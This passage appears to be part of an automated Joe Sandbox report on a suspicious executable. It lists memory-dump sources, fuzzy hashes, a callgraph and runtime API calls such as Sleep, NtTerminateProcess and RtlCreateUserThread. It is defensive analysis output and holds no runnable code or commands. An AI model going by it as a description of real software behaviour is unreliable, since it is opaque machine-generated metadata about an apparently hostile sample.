                                                                                          • Source File: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0098C000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_98c000_hdeufvw.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction ID: a60c902bec2031f5742fec4ccefc9cd8706638dc4439341b57e1d52b941d02c2
                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction Fuzzy Hash: 6F113F79A00208FFDB01DF98C985E98BBF5AF08350F058094F9489B362D371EA50DF80

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:23
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 667 402ad1 668 402ad2 667->668 670 402b56 668->670 671 40180c 668->671 672 40181b 671->672 673 40183e Sleep 672->673 675 401859 673->675 674 40186a NtTerminateProcess 676 401876 674->676 675->674 676->670 685 401818 686 40181b 685->686 687 40183e Sleep 686->687 688 401859 687->688 689 40186a NtTerminateProcess 688->689 690 401876 689->690 691 402a9d 692 402ad2 691->692 693 40180c 2 API calls 692->693 694 402b56 692->694 693->694 677 402bef 678 402cef 677->678 679 402c19 677->679 679->678 679->679 680 402c91 RtlCreateUserThread 679->680 680->678

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_00402BEF 28 Function_004025EF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                                                                                          Executed Functions

                                                                                          Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                                                                                          • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                                                                                          Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                                                                                          • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                                                                                          Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                                                                                          • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                                                                                          Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                                                                                          • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                                                                                          Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39sleepnativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                                                                                          • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                                                                                          Function 00402BEF Relevance: 1.6, APIs: 1, Instructions: 123threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 100 402bef-402c13 101 402c19-402c2b 100->101 102 402cef-402cf4 100->102 101->102 103 402c31-402c42 101->103 104 402c44-402c4d 103->104 105 402c52-402c60 104->105 105->105 106 402c62-402c69 105->106 107 402c72-402c88 106->107 108 402c6b 106->108 110 402c8a-402c8f 107->110 108->104 109 402c6d-402c70 108->109 109->110 110->102 111 402c91-402ced RtlCreateUserThread 110->111 111->102
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThreadUser
                                                                                          • String ID:
                                                                                          • API String ID: 1531140918-0
                                                                                          • Opcode ID: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction ID: 1db3e151d03db0a1b2d88b33ccc958aaf7204f5d63625af9f32895d8f10b8312
                                                                                          • Opcode Fuzzy Hash: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction Fuzzy Hash: D131F631218D098FE798DF1CD889BA273D1F798350F6542AAE809C3395EA74DC5187C6